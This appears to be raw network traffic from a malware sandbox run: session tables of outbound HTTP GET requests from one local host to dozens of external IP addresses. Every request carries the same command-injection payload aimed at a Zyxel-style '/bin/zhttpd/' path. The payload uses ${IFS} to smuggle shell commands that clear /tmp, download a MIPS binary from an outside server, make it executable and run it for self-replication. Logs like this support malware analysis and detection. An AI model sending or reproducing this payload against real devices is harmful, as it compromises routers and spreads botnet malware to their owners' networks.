                                                Jan 28, 2024 10:16:37.996536016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7687192.168.2.2345398201.139.205.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996548891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7688192.168.2.2336922185.161.96.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996573925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7689192.168.2.2352646126.244.160.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996578932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7690192.168.2.234723012.118.174.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996634007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7691192.168.2.2355092125.174.214.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996648073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7692192.168.2.2334200106.31.52.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996697903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7693192.168.2.2338870148.105.200.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996737003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7694192.168.2.235527873.36.206.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996737003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7695192.168.2.234475820.52.104.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996771097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7696192.168.2.2349372160.128.229.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996798992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7697192.168.2.235063688.214.164.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996813059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7698192.168.2.2342990140.41.136.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996830940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7699192.168.2.2355710218.223.96.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996850014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7700192.168.2.235520634.59.38.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996886015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7701192.168.2.233494483.168.18.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996932983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7702192.168.2.235506245.196.84.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996948957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7703192.168.2.2360490196.14.184.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996984005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7704192.168.2.235759417.110.193.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996984005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7705192.168.2.2357468222.245.87.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997036934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7706192.168.2.2336806128.207.168.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997054100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7707192.168.2.2351258163.196.108.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997080088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7708192.168.2.2360478163.24.8.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997138023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7709192.168.2.235254496.18.155.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997160912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7710192.168.2.236091074.26.204.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997183084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7711192.168.2.2333794146.219.151.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997198105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7712192.168.2.2353542144.201.103.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997226954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7713192.168.2.2353762196.27.178.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997265100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7714192.168.2.2335702144.75.93.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997272968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7715192.168.2.2354474221.227.103.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997278929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7716192.168.2.235482674.44.184.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997325897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7717192.168.2.2359146209.95.228.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997363091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7718192.168.2.235348497.54.158.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997406960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7719192.168.2.2352250154.138.218.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997442007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7720192.168.2.233278258.172.181.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997466087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7721192.168.2.234783450.251.253.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997484922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7722192.168.2.2335910204.138.114.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997510910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7723192.168.2.2351036187.234.127.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997529984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7724192.168.2.2354640112.58.215.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997572899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7725192.168.2.2348800184.44.201.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997590065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7726192.168.2.2345514157.26.250.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997620106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7727192.168.2.2344458168.92.111.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997646093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7728192.168.2.23460049.16.21.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997662067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7729192.168.2.2348876197.196.68.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997674942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7730192.168.2.2338072112.172.194.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997703075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7731192.168.2.233699441.148.194.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997733116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7732192.168.2.2349794169.147.28.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997773886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7733192.168.2.2358518112.9.41.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997773886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7734192.168.2.2341368139.112.102.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997829914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7735192.168.2.2354692197.105.131.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997859001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7736192.168.2.2347960191.5.79.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997895956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7737192.168.2.2355344129.181.199.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997917891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7738192.168.2.235478685.75.48.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997946024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7739192.168.2.2346520167.65.239.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997947931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7740192.168.2.2357940163.200.252.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.997982979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7741192.168.2.2349082137.44.31.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998033047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7742192.168.2.2344620151.186.178.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998064995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7743192.168.2.234927282.253.194.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998080015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7744192.168.2.2332930121.168.116.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998111010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7745192.168.2.2352992208.5.149.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998151064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7746192.168.2.2342092149.182.201.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998151064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7747192.168.2.235736251.109.118.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998164892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7748192.168.2.2348038164.157.222.198443
                                                TimestampBytes transferredDirectionData
